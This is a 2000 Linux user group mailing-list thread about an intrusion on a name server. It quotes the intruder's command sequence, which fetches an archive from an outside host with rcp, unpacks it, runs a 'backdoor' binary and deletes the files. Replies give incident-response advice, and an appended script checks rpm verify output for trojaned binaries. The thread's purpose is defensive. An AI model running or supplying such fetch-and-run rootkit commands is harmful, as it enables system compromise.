[lug] What does this mean?
Cory Dekker
cory at sysmgrs.com
Tue Mar 21 00:10:31 MST 2000
You should also probably file a CERT incident, especially with respect
to linux7.europop.de, so that it is either recognized as a hacker box (not
likely) or the System Admin can be notified that their box has probably
been compromised (highly likely).
-Cory
Tkil wrote:
> >>>>> "Shannon" == nunar <nunar at mauromedia.net> writes:
>
> [reformatted for sanity]
>
> Shannon> I was going through my name server and somebody had entered this:
> Shannon> # cd /tmp; \
> Shannon> rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
> Shannon> echo "* downloaded "; \
> Shannon> tar xfz ak*; \
> Shannon> cd ak; \
> Shannon> ./backdoor/ls; \
> Shannon> cd ..; \
> Shannon> rm -rf ak*; \
> Shannon> exit
>
> note that the only line which actually looks dangerous is the
> "./backdoor/ls" one; everything else should be pretty polite.
> (although, if they already have root... ouch.)
>
> Shannon> Does anybody know what this is doing to my system?
>
> short version: someone tried to run a rootkit against your box. i
> can't tell offhand whether or not they succeeded, but you should
> probably "rm -rf /tmp/backup" at the very least.
>
> jafo says: if you are running redhat, check the MD5 sums of all the
> packages on the box (this is an option to 'rpm'; consult the man page,
> but"--verify" should be close...)
>
> jafo also says: consult the most excellent linux security howto. (hi
> kev!) accessible at:
>
> http://www.tummy.com/security-howto/
>
> prepare to do a backup of important data (e.g. your named config
> files) and possibly do a full reinstall. be absolutely sure you are
> running the latest versions of named and friends (BIND-*). also,
> don't do a blind copy of the named config files; double-check that
> nobody is using your server who shouldn't be.
>
> t.
>
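Following up on the "rpm --verify" advice in the thread, here is an added example (not from the original posters) that triages `rpm -Va` output for system binaries whose size or MD5 digest no longer matches the package, which is what a trojaned `ls` would show up as. The sample lines are constructed to look like rpm verify output; the attribute-column layout (S size, M mode, 5 digest, ..., T mtime) and the optional `c`/`d` file-type letter are assumed from rpm's documented verify format.

```shell
#!/bin/sh
# Constructed sample of `rpm -Va` output for a box where /bin/ls and
# in.telnetd were replaced. Not real output from the poster's machine.
SAMPLE='S.5....T.    /bin/ls
.......T.    /usr/bin/vi
S.5....T.  c /etc/issue
missing      /usr/share/doc/foo/README
.M.......    /var/log
SM5....T.    /usr/sbin/in.telnetd'

# suspicious_binaries: read rpm verify lines on stdin and print the path of
# every file whose digest ("5") or size ("S") changed, skipping files rpm
# marks as config ("c") or documentation ("d"), since those legitimately
# drift. A packaged binary whose digest changed should never happen on a
# healthy box and is the classic sign of a rootkit-replaced command.
suspicious_binaries() {
  awk '
    $1 == "missing" { next }             # deleted files need separate review
    index($1, "5") || index($1, "S") {
      # a type letter is present only when the line has three fields
      if (NF == 3 && ($2 == "c" || $2 == "d")) next
      print $NF
    }'
}

# Stand-alone demo on the constructed sample; on a live system use:
#   rpm -Va | suspicious_binaries
printf '%s\n' "$SAMPLE" | suspicious_binaries
```

On a suspected rootkit victim, run the verify from a trusted boot medium with a clean `rpm` binary and a clean RPM database copy, because a rootkit that replaced `ls` can just as easily have replaced `rpm` or edited the database it checks against.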